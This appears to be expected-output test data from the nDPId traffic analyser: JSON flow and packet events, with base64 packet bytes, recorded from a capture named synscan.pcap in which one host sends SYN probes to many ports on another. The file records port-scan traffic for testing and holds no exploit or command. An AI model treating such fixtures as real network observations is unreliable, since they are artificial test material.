+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jUAADUGQT2sEAAIQA2GNIzSgA7dUoMYAAAAAGACCACwgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oMAACkGNO+sEAAIQA2GNIzSBDfdUoMYAAAAAGACCAAsWAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs78YAACwGLKysEAAIQA2GNIzSBHXdUoMYAAAAAGACBAAwGgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GgAACkGKwqsEAAIQA2GNIzSAmndUoMYAAAAAGACCAAuJgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsJhYAADUG7VysEAAIQA2GNIzTKXndU4MZAAAAAGACCAAHEwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsDq4AACcGEsWsEAAIQA2GNIzTCDvdU4MZAAAAAGACEAAgUQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsKtQAACwG8Z6sEAAIQA2GNIzTJtfdU4MZAAAAAGACBAANtQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsiiIAADcGh1CsEAAIQA2GNIzTBy\/dU4MZAAAAAGACEAAhXQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsuHAAADUGWwKsEAAIQA2GNIzTwA3dU4MZAAAAAGACCABwfgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsABEAADIGFmKsEAAIQA2GNIzTAW7dU4MZAAAAAGACDAArHgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs+lUAADMGGx2sEAAIQA2GNIzTBHzdU4MZAAAAAGACEAAkEAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsym4AAC8GTwSsEAAIQA2GNIzTBnrdU4MZAAAAAGACEAAiEgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAAC8GRnKsEAAIQA2GNIzTAH3dU4MZAAAAAGACEAAoDwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsU2gAADoGuwqsEAAIQA2GNIzTPoDdU4MZAAAAAGACDADuCwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAspR0AACYGfVWsEAAIQA2GNIzTBrbdU4MZAAAAAGACDAAl1gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsaGIAADEGrxCsEAAIQA2GNIzTKhrdU4MZAAAAAGACCAAGcgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADAGmSasEAAIQA2GNIzTBrndU4MZAAAAAGACBAAt0wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs3P8AAC4GPXOsEAAIQA2GNIzTBK\/dU4MZAAAAAGACDAAn3QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAstBMAACsGaV+sEAAIQA2GNIzTB1PdU4MZAAAAAGACEAAhOQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAEAADUG43GsEAAIQA2GNIzTDT7dU4MZAAAAAGACCAAjTgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsRyIAAC0G1FCsEAAIQA2GNIzTIf3dU4MZAAAAAGACCAAOjwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsWeIAACUGyZCsEAAIQA2GNIzTBDvdU4MZAAAAAGACCAAsUQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAso64AADAGdMSsEAAIQA2GNIzSgAvdUoMYAAAAAGACBAC0gwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAss6AAADcGXdKsEAAIQA2GNIzSwATdUoMYAAAAAGACEABoigAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
